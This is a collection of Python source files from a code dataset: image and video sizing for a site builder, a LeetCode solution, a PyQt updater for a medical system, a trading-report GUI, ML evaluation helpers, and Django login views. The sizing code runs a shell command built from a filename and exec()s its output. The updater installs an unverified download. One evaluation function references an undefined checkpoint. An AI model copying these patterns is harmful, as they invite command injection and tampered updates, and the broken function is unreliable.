# PIL doesn't support SVG.\n # Instead, parse as XML.\n # Width and Height are stored as attributes on the root SVG element.\n tree = ElementTree.parse(self.src_filename)\n root = tree.getroot()\n width = int(float(root.attrib[\"width\"].replace(\"pt\", \"\").replace(\"mm\", \"\")))\n height = int(float(root.attrib[\"height\"].replace(\"pt\", \"\").replace(\"mm\", \"\")))\n return (width, height)\n elif get_ext(self.intermediate_path) in VID_EXTENSIONS:\n cmd = \"ffprobe -show_entries stream=height,width -v error -of flat=s=_ %s\" %self.src_filename\n p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n output = p.communicate()\n video_vars = {}\n for line in output:\n exec(line, video_vars)\n return int(video_vars[\"streams_stream_0_width\"]), int(video_vars[\"streams_stream_0_height\"])\n else:\n im = PIL.Image.open(self.src_filename)\n return im.size\n\n def get_src_info(self):\n src_info = self.base_src_info\n src_info['size'] = self.size\n return src_info\n\n\n #@property\n #def rasterized(self):\n # \"\"\"Return an Image object for a rasterized version of this image.\n # For non-vector graphics, this is a noop.\n # \"\"\"\n # if self.path_on_disk.endswith(\".svg\"):\n # return Image(path_on_disk=self.path_in_build_tree[:-4] + \".png\", need_exist=False)\n # else:\n # return self\n\nclass BinaryBlob(Page):\n def get_src_info(self):\n return self.base_src_info\n\nclass Author(object):\n def __init__(self, name):\n self.name = name\n def __eq__(self, other):\n return self.name == other.name\n def __hash__(self):\n return hash(self.name)\n\nclass BlogEntry(Page):\n do_render_with_jinja = True\n\nclass HomePage(Page):\n do_render_with_jinja = True\n\nclass AboutPage(Page):\n do_render_with_jinja = True\n\n","sub_path":"src/page_info.py","file_name":"page_info.py","file_ext":"py","file_size_in_byte":14753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"640723855","text":"# https://leetcode.com/problems/permutations/\n\nclass Solution(object):\n def permute(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n res = []\n def permutation(nums, l, r):\n if l == r:\n res.append(nums)\n else:\n for i in range(l, len(nums)):\n new_nums = copy.deepcopy(nums)\n new_nums[l], new_nums[i] = new_nums[i], new_nums[l]\n permutation(new_nums, l + 1, r)\n permutation(nums, 0, len(nums) - 1)\n return res\n \n\n\n","sub_path":"leetcode/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"405320985","text":"\n# 輸入處方 2018.06.15\n#coding: utf-8\n\nfrom PyQt5 import QtWidgets, QtCore\nfrom PyQt5.QtWidgets import QFileDialog, QMessageBox, QPushButton\n\nimport urllib.request\nfrom threading import Thread\nfrom queue import Queue\n\nimport os.path\nfrom os import listdir\nimport ntpath\nimport shutil\nimport datetime\n\nfrom classes import table_widget\nfrom libs import ui_utils\nfrom libs import system_utils\nfrom libs import string_utils\n\n\n# 醫療系統更新\nclass SystemUpdate(QtWidgets.QDialog):\n # 初始化\n def __init__(self, parent=None, *args):\n super(SystemUpdate, self).__init__(parent)\n self.parent = parent\n self.database = args[0]\n self.system_settings = args[1]\n\n self.ui = None\n\n self._set_ui()\n self._set_signal()\n\n # 解構\n def __del__(self):\n self.close_all()\n\n # 關閉G\n def close_all(self):\n pass\n\n # 設定GUI\n def _set_ui(self):\n self.ui = ui_utils.load_ui_file(ui_utils.UI_SYSTEM_UPDATE, self)\n self.setFixedSize(self.size()) # non resizable dialog\n system_utils.set_css(self, self.system_settings)\n system_utils.center_window(self)\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setText('開始更新')\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Cancel).setText('取消')\n self.ui.toolButton_open_file.clicked.connect(self._open_file)\n self.ui.lineEdit_file_name.textChanged.connect(self._file_name_changed)\n\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False)\n\n self.table_widget_file_list = table_widget.TableWidget(self.ui.tableWidget_file_list, self.database)\n self._set_table_width()\n\n self._set_radio_buttons()\n self.ui.lineEdit_file_name.setFocus()\n\n # 設定信號\n def _set_signal(self):\n self.ui.buttonBox.accepted.connect(self.accepted_button_clicked)\n self.ui.radioButton_auto_update.clicked.connect(self._set_radio_buttons)\n self.ui.radioButton_manual_update.clicked.connect(self._set_radio_buttons)\n self.ui.pushButton_download.clicked.connect(self._check_downloaded_file)\n\n def _set_radio_buttons(self):\n self.ui.pushButton_download.setEnabled(False)\n self.ui.lineEdit_file_name.setEnabled(False)\n self.ui.toolButton_open_file.setEnabled(False)\n\n if self.ui.radioButton_auto_update.isChecked():\n self.ui.pushButton_download.setEnabled(True)\n else:\n self.ui.lineEdit_file_name.setEnabled(True)\n self.ui.toolButton_open_file.setEnabled(True)\n\n def _set_table_width(self):\n width = [200, 220, 350, 200]\n self.table_widget_file_list.set_table_heading_width(width)\n\n def _open_file(self):\n options = QFileDialog.Options()\n\n fileName, _ = QFileDialog.getOpenFileName(self,\n \"開啟更新檔\", '*.zip',\n \"zip 壓縮檔 (*.zip);;Text Files (*.txt)\", options = options)\n if fileName:\n self.ui.lineEdit_file_name.setText(fileName)\n\n def _file_name_changed(self):\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(False)\n\n file_name = self.ui.lineEdit_file_name.text()\n if file_name == '':\n return\n\n if not os.path.isfile(file_name):\n return\n\n zip_file_name = self.ui.lineEdit_file_name.text()\n self._check_files(zip_file_name)\n\n def accepted_button_clicked(self):\n self._update_files()\n\n msg_box = QMessageBox()\n msg_box.setIcon(QMessageBox.Information)\n msg_box.setWindowTitle('系統更新完成')\n msg_box.setText(\"恭喜您! 系統已更新至最新檔, 系統檔案全部更新成功.\")\n msg_box.setInformativeText(\"為了讓更新檔生效, 即將重新啟動醫療系統.\")\n msg_box.addButton(QPushButton(\"確定\"), QMessageBox.YesRole)\n msg_box.exec_()\n\n self.parent.restart_pymedical()\n\n def _check_files(self, zip_file_name):\n dest_root = os.path.dirname(os.path.abspath(__file__))\n\n temp_dir = os.path.join(dest_root, '_temp')\n if os.path.exists(temp_dir):\n shutil.rmtree(temp_dir)\n\n os.mkdir(temp_dir)\n system_utils.unzip_file(zip_file_name, temp_dir)\n\n zip_dir = ntpath.basename(zip_file_name).split('.')[0]\n\n zip_source_root = os.path.join(temp_dir, zip_dir)\n\n self.ui.tableWidget_file_list.setRowCount(0)\n\n self._list_files(zip_source_root, dest_root, '')\n self._list_files(zip_source_root, dest_root, 'classes')\n self._list_files(zip_source_root, dest_root, 'convert')\n self._list_files(zip_source_root, dest_root, 'css')\n self._list_files(zip_source_root, dest_root, 'dialog')\n self._list_files(zip_source_root, dest_root, 'libs')\n self._list_files(zip_source_root, dest_root, 'mysql')\n self._list_files(zip_source_root, dest_root, 'printer')\n self._list_files(zip_source_root, dest_root, 'ui')\n self._list_files(zip_source_root, dest_root, 'images')\n\n self.ui.tableWidget_file_list.resizeRowsToContents()\n\n if self.ui.tableWidget_file_list.rowCount() <= 0:\n msg_box = QMessageBox()\n msg_box.setIcon(QMessageBox.Warning)\n msg_box.setWindowTitle('系統更新完成')\n msg_box.setText(\"經過檢查更新檔案, 發現系統已經是最新檔, 不需更新.\")\n msg_box.setInformativeText(\"請按取消鍵結束系統更新.\")\n msg_box.addButton(QPushButton(\"確定\"), QMessageBox.YesRole)\n msg_box.exec_()\n return\n\n self.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Ok).setEnabled(True)\n\n def _list_files(self, zip_source_root, dest_root, dir_name):\n source_dir = os.path.join(zip_source_root, dir_name)\n dest_dir = os.path.join(dest_root, dir_name)\n\n source_files = [f for f in listdir(source_dir) if os.path.isfile(os.path.join(source_dir, f))]\n\n for file in source_files:\n source_file_name = file\n source_file_date = datetime.datetime.fromtimestamp(\n self.creation_date(os.path.join(source_dir, source_file_name))\n )\n row = [source_file_name, source_dir, dest_dir, source_file_date]\n\n dest_file_name = os.path.join(dest_dir, source_file_name)\n if not os.path.isfile(dest_file_name):\n self._add_list(row)\n continue\n\n dest_file_date = datetime.datetime.fromtimestamp(\n self.creation_date(os.path.join(dest_dir, dest_file_name))\n )\n if source_file_date > dest_file_date:\n self._add_list(row)\n\n def _add_list(self, row):\n row_no = self.ui.tableWidget_file_list.rowCount()\n self.ui.tableWidget_file_list.setRowCount(row_no + 1)\n\n for column in range(len(row)):\n self.ui.tableWidget_file_list.setItem(\n row_no, column,\n QtWidgets.QTableWidgetItem(string_utils.xstr(row[column]))\n )\n\n def creation_date(self, file_name):\n # if sys.platform == 'win32':\n # return os.path.getctime(file_name)\n # else:\n # return os.stat(file_name).st_mtime\n\n return os.stat(file_name).st_mtime\n\n def _update_files(self):\n row_count = self.ui.tableWidget_file_list.rowCount()\n self.ui.progressBar.setMaximum(row_count)\n\n for row_no in range(row_count):\n self.ui.progressBar.setValue(row_no)\n source_dir = self.ui.tableWidget_file_list.item(row_no, 1).text()\n dest_dir = self.ui.tableWidget_file_list.item(row_no, 2).text()\n\n if not os.path.exists(dest_dir):\n os.mkdir(dest_dir)\n\n source_file_name = os.path.join(source_dir, self.ui.tableWidget_file_list.item(row_no, 0).text())\n dest_file_name = os.path.join(dest_dir, self.ui.tableWidget_file_list.item(row_no, 0).text())\n\n shutil.copy2(source_file_name, dest_file_name)\n\n @staticmethod\n def _message_box(title, message, hint):\n msg_box = QMessageBox()\n msg_box.setIcon(QMessageBox.Information)\n msg_box.setWindowTitle(title)\n msg_box.setText(message)\n msg_box.setInformativeText(hint)\n msg_box.setStandardButtons(QMessageBox.NoButton)\n\n return msg_box\n\n def _download_file_thread(self, out_queue):\n QtCore.QCoreApplication.processEvents()\n\n url = 'https://www.dropbox.com/s/4h4a35ygzqx7duc/pymedical.zip?dl=1'\n u = urllib.request.urlopen(url)\n data = u.read()\n u.close()\n download_file_name = 'pymedical.zip'\n with open(download_file_name, \"wb\") as f:\n f.write(data)\n\n out_queue.put(download_file_name)\n\n # 取得安全簽章\n def _check_downloaded_file(self):\n title = '下載更新檔'\n message = '正在下載醫療系統更新檔, 請稍後...'\n hint = '正在與更新檔資料庫連線, 會花費一些時間.'\n msg_box = self._message_box(title, message, hint)\n msg_box.show()\n\n msg_queue = Queue()\n QtCore.QCoreApplication.processEvents()\n\n t = Thread(target=self._download_file_thread, args=(msg_queue, ))\n t.start()\n download_file_name = msg_queue.get()\n msg_box.close()\n\n self._check_files(download_file_name)\n","sub_path":"system_update.py","file_name":"system_update.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525208614","text":"\"\"\"-------------------------------------------------------------------------------------------------------\nMODULE\n FAptReport - RunScriptGui\n \n (c) Copyright 2010 by Sungard FRONT ARENA. All rights reserved.\n\nDESCRIPTION\n\n-------------------------------------------------------------------------------------------------------\"\"\"\nimport os\nimport glob\nimport re\nimport acm\nimport FRunScriptGUI\nimport FLogger\nimport FAptTest\nimport FAptReportUtils\nimport FAptReportGenerate\nimport FAptReportCommon\n\nlogger = FLogger.FLogger.GetLogger('APT')\n\nfalseTrue = ['False', 'True']\n\nclass FAptReport(FRunScriptGUI.AelVariablesHandler):\n \"\"\"class representing gui\"\"\"\n \n GUI_PARAMS = {'runButtonLabel': '&&Run Report',\n 'hideExtraControls': False,\n 'windowCaption' : __name__}\n \n class Parameters( object ):\n \"\"\"class holding gui parameter names and values\"\"\"\n \n REPORT_NAME = 'report_name' \n FACTOR_MODEL = 'factor_model' \n PORTFOLIO = 'portfolio'\n TRADE_FILTER = 'trade_filter'\n HIDE_ZERO_UNIT_ROWS = 'hide_zero_unit_rows'\n HIDE_ZERO_PRICE_ROWS = 'hide_zero_price_rows'\n LAUNCH_APT = 'launch_apt'\n FUND_OF_FUNDS = 'fund_of_funds'\n SUB_PORT_JOB = 'sub_port_job'\n GROUPER = 'grouper'\n COMPOSITION_FILE = 'composition_file'\n UNIVERSE_FILE = 'universe_file'\n \n LOG_LEVEL = 'log_level'\n LOG_FILE = 'log_file'\n\n \n LOG_LEVEL_MAP = {'info':1, 'debug':2, 'warn':3, 'error':4, 'critical':5}\n\n \n def __init__( self, p):\n self.report_name = p.get(FAptReport.Parameters.REPORT_NAME)\n self.factor_model = p.get(FAptReport.Parameters.FACTOR_MODEL)\n self.portfolios = list(p.get(FAptReport.Parameters.PORTFOLIO))\n self.trade_filters = list(p.get(FAptReport.Parameters.TRADE_FILTER))\n self.groupers = p.get(FAptReport.Parameters.GROUPER)\n self.hide_zero_unit_rows = p.get(FAptReport.Parameters.HIDE_ZERO_UNIT_ROWS)\n self.hide_zero_price_rows = p.get(FAptReport.Parameters.HIDE_ZERO_PRICE_ROWS)\n self.launch_apt = p.get(FAptReport.Parameters.LAUNCH_APT)\n \n self.composition_file = p.get(FAptReport.Parameters.COMPOSITION_FILE)\n self.universe_file = p.get(FAptReport.Parameters.UNIVERSE_FILE)\n\n self.log_level = p.get(FAptReport.Parameters.LOG_LEVEL)\n self.log_file = p.get(FAptReport.Parameters.LOG_FILE)\n\n self.validate_params()\n self.init_logger()\n \n def validate_params(self):\n \"\"\"validate parameter from gui\"\"\"\n FAptReport.validate_report_contents(self.portfolios, self.trade_filters)\n FAptReport.validate_output_file(self.composition_file)\n FAptReport.validate_output_file(self.universe_file)\n FAptReport.validate_log_file(self.log_file)\n self.validate_log_level()\n \n\n def validate_log_level(self):\n \"\"\"map log level\"\"\"\n self.log_level = self.__class__.LOG_LEVEL_MAP.get(self.log_level)\n if not self.log_level:\n raise FAptReportUtils.RunScriptGuiValidationError(\"Invalid log level.\") \n\n def init_logger(self):\n \"\"\"reinitialize logger with user preferences\"\"\"\n logger.Reinitialize(level=self.log_level, logToFileAtSpecifiedPath=self.log_file) \n\n\n\n @classmethod\n def get_gui_params( cls ):\n return cls.GUI_PARAMS\n \n @classmethod\n def validate_log_file(cls, filename):\n log_dir, file = os.path.split(filename)\n if log_dir and not os.path.exists(log_dir):\n try:\n os.makedirs(log_dir)\n logger.info(\"Created log directory %s.\", log_dir)\n except Exception as err:\n logger.error(\"Failed to created log directory %s.\", log_dir)\n raise err\n \n @classmethod\n def validate_output_file(cls, filename):\n directory, file = os.path.split(filename)\n if directory and not os.path.exists(directory):\n try:\n os.makedirs(directory)\n logger.info(\"Created directory %s.\", directory)\n except Exception as err:\n logger.error(\"Failed to created directory %s.\", directory)\n raise err\n \n @classmethod\n def validate_report_contents(cls, portfolios, trade_filters):\n if len(portfolios) == 0 and len(trade_filters) == 0:\n raise FAptReportUtils.RunScriptGuiValidationError(\"Portfolio or Trade Filter must be entered to run Apt Report\")\n \n \n def get_factor_models(self):\n #removing dependency to UserPreferences\n #self.factor_models_path = FAptReportCommon.AptDatabasePath.get_database_files_path()\n self.factor_models_path = FAptTest.AptTest._get_apt_models_path()\n try:\n os.chdir(self.factor_models_path)\n return [os.path.splitext(filename)[0] for filename in glob.glob('*.fdb')]\n\n except WindowsError as err:\n logger.warn('The system cannot find the file specified: \"%s\"', str(self.factor_models_path))\n return []\n \n def get_factor_models_names(self):\n factor_models = list(set([re.sub('((?=[A-Z][a-z])|(?<=[a-z])(?=[A-Z])|(?=[(]))', ' ', name[:-8]).lstrip() for name in self.get_factor_models()]))\n if not factor_models:\n factor_models = ['']\n logger.warn(\"Cannot find any Apt factor model file (.fdb) in the specified path: '%s'. Using default factor model '%s'\", self.factor_models_path, self.default_factor_model)\n return factor_models\n \n def get_default_factor_model_name(self):\n default_factor_model = FAptReportUtils.FAptReportParameters().get('DEFAULT_FACTOR_MODEL')\n default_factor_model = re.sub(' ', '', default_factor_model)\n if default_factor_model:\n return re.sub('((?=[A-Z][a-z])|(?<=[a-z])(?=[A-Z])|(?=[(]))', ' ', default_factor_model).lstrip()\n return self.get_factor_models_names()[0]\n\n def __init__(self):\n self.default_factor_model = self.get_default_factor_model_name()\n factor_models = self.get_factor_models_names()\n vars = [\n #Report tab\n [FAptReport.Parameters.REPORT_NAME, 'Report Name_Report', 'string',\n None, \"APT Report\", 1, 0, 'Enter report name', None, 1], \n [FAptReport.Parameters.FACTOR_MODEL, 'Factor Model_Report', 'string',\n factor_models, self.default_factor_model, 1, 0, 'Select factor model', None, 1],\n [FAptReport.Parameters.PORTFOLIO, 'Portfolio_Report', 'FPhysicalPortfolio',\n \"\", None, 0, 1, 'Select Portfolio', None, 1],\n [FAptReport.Parameters.TRADE_FILTER, 'Trade Filter_Report', 'FTradeSelection',\n \"\", None, 0, 1, 'Select Trade Filter', None, 1],\n [FAptReport.Parameters.GROUPER, 'Grouper_Report', 'FStoredPortfolioGrouper',\n \"\", None, 0, 1, 'Select Grouper', None, 1],\n [FAptReport.Parameters.HIDE_ZERO_UNIT_ROWS, 'Exclude Zero Unit Rows_Report', 'string', falseTrue, 'True', 1, 0, \n 'Excludes zero unit rows from the Apt Report ', None, 1],\n [FAptReport.Parameters.HIDE_ZERO_PRICE_ROWS, 'Exclude Zero Price Rows_Report', 'string', falseTrue, 'True', 1, 0,\n 'Excludes invalid price rows from the Apt Report ', None, 1],\n [FAptReport.Parameters.LAUNCH_APT, 'Start APTPro_Report', 'string', falseTrue, 'True', 1, 0,\n 'Starts APTPro ', None, 1],\n \n #Output tab\n [FAptReport.Parameters.COMPOSITION_FILE, 'Composition File_Output:', 'string',\n \"\", FAptReportUtils.FAptPath.get_composition_path(), 1, 0, 'Path for writing the composition file.', None, 1],\n [FAptReport.Parameters.UNIVERSE_FILE, 'Universe File_Output:', 'string',\n \"\", FAptReportUtils.FAptPath.get_universe_path(), 1, 0, 'Path for writing the universe file.', None, 1],\n \n #Log tab\n [FAptReport.Parameters.LOG_LEVEL, 'Log Level_Log:', 'string',\n ['info', 'debug', 'warn', 'error', 'critical'], 'info', 1, 0, 'Log level', None, 1],\n [FAptReport.Parameters.LOG_FILE, 'Log File_Log:', 'string',\n \"\", FAptReportUtils.FAptPath.get_apt_report_log_path(), 1, 0, 'Log file path', None, 1],\n \n ]\n\n FRunScriptGUI.AelVariablesHandler.__init__(self, vars)\n \n \nael_variables = FAptReport()\nael_variables.LoadDefaultValues(__name__)\nael_gui_parameters = FAptReport.get_gui_params()\n \ndef ael_main(parameters):\n try:\n params = FAptReport.Parameters(parameters)\n FAptReportGenerate.generate(params)\n except ImportError as err:\n logger.error(str(err))\n except Exception as err:\n logger.ELOG( str(err), exc_info=1 )\n \n\ndef startRunScript(eii):\n acm.RunModuleWithParameters(\"FAptReport\", acm.GetDefaultContext())\n\n","sub_path":"Extensions/AMI APT/FPythonCode/FAptReport.py","file_name":"FAptReport.py","file_ext":"py","file_size_in_byte":9439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"497799053","text":"import torch\nimport numpy as np\nfrom experiment import Experiment \nfrom trainer import predictions \nimport pandas as pd \nfrom sklearn import metrics\nimport torch.nn as nn\n\n\ndef get_best_model_across_seeds(df_search):\n average_scores = []\n for score in df_search['best_score']:\n average_scores.append(np.mean(eval(score)))\n df_search[\"average_score\"] = average_scores\n\n\n # get sets of hyperparameters used \n seeds = df_search.seed.unique()\n\n params = pd.DataFrame()\n\n for idx, row in df_search.iterrows():\n params = params.append(row.drop(['savename', 'best_iter', 'seed','average_score', 'best_score']).to_dict(), ignore_index = True)\n # \n params = params.drop_duplicates()\n # index by number of seeds \n best_average_performance = 0 \n best_params = {}\n best_index= 0\n not_done = False\n for i in range(0, len(df_search), len(seeds)):\n try:\n total_perf = 0\n for j in range(len(seeds)):\n total_perf += df_search.average_score[i + j]\n total_perf /= len(seeds)\n if (total_perf > best_average_performance):\n best_average_performance = total_perf \n best_params = df_search.iloc[i].drop(['savename', 'best_iter', 'seed','average_score', 'best_score']).to_dict()\n best_index = i \n except:\n not_done = True \n print(\"Not done training\")\n break\n best_model_info = []\n for k in range(len(seeds)):\n best_model_info.append(df_search.iloc[best_index + k])\n \n return best_model_info, not_done \n\ndef get_best_model_info(df_search):\n average_scores = []\n for score in df_search['best_score']:\n average_scores.append(np.mean(eval(score)))\n df_search[\"average_score\"] = average_scores\n \n print(df_search.columns)\n \n# get sets of hyperparameters used \n df_search_sorted = df_search.sort_values('average_score', ascending=False).head()\n \n \n for idx, row in df_search_sorted.iterrows():\n params = row.drop(['savename', 'best_iter', 'seed','average_score', 'best_score']).to_dict()\n\n best_model_info = df_search_sorted.iloc[0]\n return best_model_info\n\ndef load_best_model(best_model_info, device, config_str, model_type, model_name, load_filename=None):\n if load_filename is None:\n savename = best_model_info['savename']\n split = savename.split('/')\n split[-1] = 'best_' + split[-1]\n load_filename = '/'.join(split)\n \n try:\n _iter = checkpoint['_iter']\n except:\n _iter = checkpoint['_epoch']\n print(\"Loaded checkpoint (trained for {} iterations)\".format(_iter))\n \n try:\n params = best_model_info[[\"momentum\", \"seed\", \"lr\", \"batch_size\", \"augmentation\"]]\n except:\n params = best_model_info[[\"seed\", \"lr\", \"batch_size\", \"augmentation\"]]\n\n params = params.to_dict()\n \n params_alt = {}\n \n for key, value in params.items():\n if (type(value) == str):\n params_alt[key] = [eval(value)]\n else:\n params_alt[key] = [value]\n\n exp = Experiment(None, device, config_str, model_type, model_name, params_alt, None, None)\n\n model, criterion, optimizer = exp._get_model(best_model_info['seed'], params)\n model = nn.DataParallel(model)\n model.load_state_dict(checkpoint['state_dict'])\n \n model.to(device)\n \n return checkpoint, model, criterion,exp \n\ndef get_test_predictions(model, criterion, device, te_loader, task=None, model_name=None, get_all_predictions = False):\n model.eval()\n running_pred = []\n running_pred_image = []\n running_pred_ehr = []\n pt_ids = []\n y_orig_all = []\n with torch.no_grad():\n for X, y, pt_id in te_loader:\n for p in pt_id:\n pt_ids.append(p)\n if (type(X) is list):\n for i in range(len(X)):\n X[i] = X[i].to(device).half()\n y = y.to(device).half()\n else: \n X,y = X.to(device).half(), y.to(device).half()\n\n# print(\"model name:\", model_name)\n if (\"bias_\" in model_name[0:5]):\n \n output = model(X) \n# print(\"prediction shape:\", output[0].shape, output[1].shape)\n if (get_all_predictions):\n predicted = (predictions(output[0].data), predictions(output[1].data))\n running_pred_image.append((predicted[0].data.detach().cpu().numpy(), y.data.detach().cpu().numpy()))\n running_pred_ehr.append((predicted[1].data.detach().cpu().numpy(), X[1].data.detach().cpu().numpy()))\n y_pred_image, y_true_image = zip(*running_pred_image)\n y_pred_ehr, y_true_ehr = zip(*running_pred_ehr)\n y_pred = (y_pred_image, y_pred_ehr)\n y_true = (y_true_image, y_true_ehr)\n\n else:\n predicted = predictions(output[0].data)\n running_pred.append((predicted.data.detach().cpu().numpy(), y.data.detach().cpu().numpy()))\n y_pred, y_true = zip(*running_pred)\n\n else:\n output = torch.squeeze(model(X))\n# print(output)\n y = torch.squeeze(y)\n\n # mask loss \n# output[y<0] = y[y<0]\n\n predicted = predictions(output.data)\n\n running_pred.append((predicted.data.detach().cpu().numpy(), y.data.detach().cpu().numpy()))\n y_pred, y_true = zip(*running_pred)\n return y_true, y_pred, pt_ids\n \n \n\ndef save_test_predictions(checkpoint_str, pts, y_true, y_score, model_name):\n import pathlib\n pathlib.Path('./output/{}/'.format(checkpoint_str)).mkdir(parents=True, exist_ok=True)\n \n fname = './output/{}/'.format(checkpoint_str)\n \n np.savez(\n open(fname, 'wb'),\n y_score = y_score,\n y_true = y_true,\n pts = pts,\n )\n \n print('Test predictions saved to', fname)\n\n \ndef calc_roc(y_true, y_pred, pt_ids):\n \n\n unique_pt_ids = np.unique(pt_ids)\n unique_predictions = []\n unique_truth_values = []\n for pt_id in unique_pt_ids:\n indices = np.where(pt_ids == pt_id)[0]\n\n if(len(y_pred[indices]) == 1):\n unique_predictions.append(y_pred[indices][0])\n unique_truth_values.append(y_true[indices][0])\n else:\n unique_predictions.append(np.average(y_pred[indices], axis = 0))\n unique_truth_values.append(np.average(y_true[indices], axis = 0))\n \n unique_predictions = np.squeeze(np.array(unique_predictions))\n\n unique_truth_values = np.squeeze(np.array(unique_truth_values))\n\n \n# mask loss \n unique_predictions[unique_truth_values<0] = unique_truth_values[unique_truth_values<0]\n if (len(y_pred.shape) == 1):\n y_pred = np.expand_dims(y_pred, axis = 1) \n n_classes = y_pred.shape[1]\n# print(\"num classes:\", n_classes)\n score = []\n\n if (n_classes == 1):\n score.append(metrics.roc_auc_score(unique_truth_values.astype(int), unique_predictions))\n else:\n for n in range(n_classes):\n try:\n score.append(metrics.roc_auc_score(unique_truth_values[:,n].astype(int), unique_predictions[:,n]))\n except:\n score.append(0.5)\n return score, unique_predictions, unique_truth_values, unique_pt_ids","sub_path":"evaluate/.ipynb_checkpoints/evaluate_models-checkpoint.py","file_name":"evaluate_models-checkpoint.py","file_ext":"py","file_size_in_byte":7510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"485834987","text":"from django.contrib.auth.forms import AuthenticationForm\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom .forms import *\n\n\ndef login(request):\n if request.user.is_authenticated():\n print('hi')\n return redirect('core:home')\n\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n print('hello')\n redirect_url = request.GET.get('next', reverse('core:home'))\n auth_login(request, form.get_user())\n return redirect(redirect_url)\n\n else:\n form = AuthenticationForm()\n\n return render(request, 'core/login.html', {'login_form': form})\n\n\ndef register(request):\n if request.user.is_authenticated():\n return redirect('core:home')\n\n if request.method == 'POST':\n form = RegistrationForm(data=request.POST)\n\n if form.is_valid():\n new_member = form.save()\n new_member.save()\n return redirect('core:login')\n\n else:\n form = RegistrationForm()\n\n return render(request, 'core/register.html',\n {'register_form': form})\n\n\ndef logout(request):\n auth_logout(request)\n return redirect('core:home')\n\n\ndef home(request):\n return render(request, 'core/home.html')\n","sub_path":"mysite/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"609904257","text":"# coding: utf-8\n\ns = input().rstrip().split(\" \")\nd = [int(s[0]), int(s[1])]\n\ncnt = 0\n\nfor n in d:\n if n > 5:\n cnt += 5\n else:\n cnt += n\n\nprint(cnt)\n","sub_path":"src/paiza/d/D050.py","file_name":"D050.py","file_ext":"py","file_size_in_byte":168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"132004798","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n\nimport matplotlib.pyplot as plt\nimport mxnet as mx\nfrom mxnet import autograd, gluon, init, nd\nfrom mxnet.gluon import loss as gloss, nn\nfrom mxnet.gluon import data as gdata\nfrom common_mx import *\n\ndef vgg_block(num_convs, num_channels):\n blk = nn.Sequential()\n for _ in range(num_convs):\n blk.add(nn.Conv2D(num_channels, kernel_size=3, padding=1),\n nn.BatchNorm(), nn.Activation('relu'))\n blk.add(nn.MaxPool2D(pool_size=1, strides=2))\n return blk\n\ndef vgg(vgg_arch_tuple):\n net = nn.Sequential()\n\n for num_convs, num_channels in vgg_arch_tuple:\n net.add(vgg_block(num_convs, num_channels))\n\n net.add(nn.Dense(4096), nn.Dropout(0.5),\n nn.BatchNorm(), nn.Activation('relu'),\n nn.Dense(4096), nn.Dropout(0.5),\n nn.BatchNorm(), nn.Activation('relu'),\n nn.Dense(10))\n return net\n\n\n\nif __name__=='__main__':\n if len(sys.argv) < 2:\n print(\"pls enter training epochs num\")\n raise SystemExit(1)\n\n batch_size=100\n train_data_batched, test_data_batched = load_data_fashion_mnist(batch_size=batch_size)\n vgg_11_arch_tuple = ((1, 16), (1, 32), (2, 64), (2, 128), (2, 128))\n vgg_11 = vgg(vgg_11_arch_tuple)\n\n '''\n X = nd.random.uniform(shape=(100, 1, 28, 28))\n vgg_11.initialize()\n for blk in vgg_11:\n X = blk(X)\n print(blk.name, 'output shape:\\t', X.shape)\n '''\n lr = 0.05\n num_epochs = int(sys.argv[1])\n vgg_11.initialize(force_reinit=True, init=init.Xavier(), ctx=ctx)\n trainer = gluon.Trainer(vgg_11.collect_params(), 'sgd', {'learning_rate': lr})\n test_acc_list = do_train(net=vgg_11, \n train_iter=train_data_batched, test_iter=test_data_batched, \n batch_size=batch_size, trainer=trainer, \n num_epochs=num_epochs, ctx=ctx)\n pkl_file = os.path.basename(__file__).split('.')[0] + '.pkl'\n with open(pkl_file, 'wb') as pkl_f:\n pickle.dump(test_acc_list, pkl_f)\n \n\n \n","sub_path":"es_mxnet_imp/vgg_batchnorm.py","file_name":"vgg_batchnorm.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"77658965","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nx=0\ny=0\nd=[0]\nn=int(sys.argv[1])\na=2*np.pi*np.random.random(n)\n\nfor i in range(n):\n s=np.sin(a[i])\n c=np.cos(a[i])\n x=x+s\n y=y+c\n u=np.sqrt((x**2)+(y**2))\n d.append(u)\n plt.plot(d)\n\nax = plt.axes()\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_title(\"Movimiento Browniano, \"+str(n)+\" iteraciones\")\n\nfilename = 'Browniano_2D_'+str(n) \nplt.savefig(filename + '.pdf',format = 'pdf', transparent=False)\n \n","sub_path":"Python/Browniano_2D.py","file_name":"Browniano_2D.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"513622398","text":"#!/usr/bin/env python\n\nimport argparse\nparser = 